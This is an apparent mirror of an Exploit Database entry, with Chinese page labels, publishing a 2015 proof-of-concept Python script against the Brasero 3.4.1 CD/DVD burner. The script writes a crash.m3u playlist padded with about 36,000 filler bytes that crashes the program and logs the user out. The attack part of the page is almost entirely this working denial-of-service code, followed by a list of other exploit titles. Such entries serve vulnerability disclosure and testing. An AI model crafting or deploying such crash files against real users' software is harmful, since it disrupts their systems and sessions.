Brasero CD/DVD Burner 3.4.1 – ‘.m3u’ Buffer Overflow Crash (PoC)

Exploit Database
16 阅读

作者： Avinash Thapa

日期： 2015-03-16
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/36388/

#!/usr/bin/python

#Exploit title: Brasero 3.4.1 'm3u' Buffer Overflow POC
#Date Discovered: 15th March' 2015
# Exploit Author: Avinash Kumar Thapa "-Acid"
# Vulnerable Software: Brasero 3.4.1 CD/DVD for the Gnome Desktop
# Homepage:https://wiki.gnome.org/Apps/Brasero
# Tested on: Kali Linux 1.0.9

buffer ="A"*26109

buffer += "CCCC"

buffer += "D"*10500

file = "crash.m3u"

f = open(file, "w")

f.write(buffer)

f.close()

# After running exploit, run malicious file with brasero CD/DVD burner and check the crash which leads to logged out from your current session.
#####################################################################
# -Acid #
#####################################################################

last Exploits
Brasero CD/DVD Burner 3.4.1 – ‘.m3u’ Buffer Overflow Crash (PoC)的更多信息

Adobe Flash – Zlib Codec Heap Overflow：
ircd-hybrid 8.0.5 – Denial of Service：
Microsoft Edge Chakra – ‘InterpreterStackFrame::ProcessLinkFailedAsmJsModule’ Incorrect Usage of ‘PushPopFrameHelper’ (Denial of Service)：
Microsoft Internet Explorer 11 – MSHTML CView::CalculateImageImmunity Use-After-Free：
Microsoft Edge – ‘Array.filter’ Information Leak：
Managed Switch Port Mapping Tool 2.85.2 – Denial of Service (PoC)：
Apple Mac OSX – ‘IOHDIXControllerUserClient::convertClient’ Buffer Integer Overflow：
Microsoft Windows SMB Server (v1/v2) – Mount Point Arbitrary Device Open Privilege Escalation：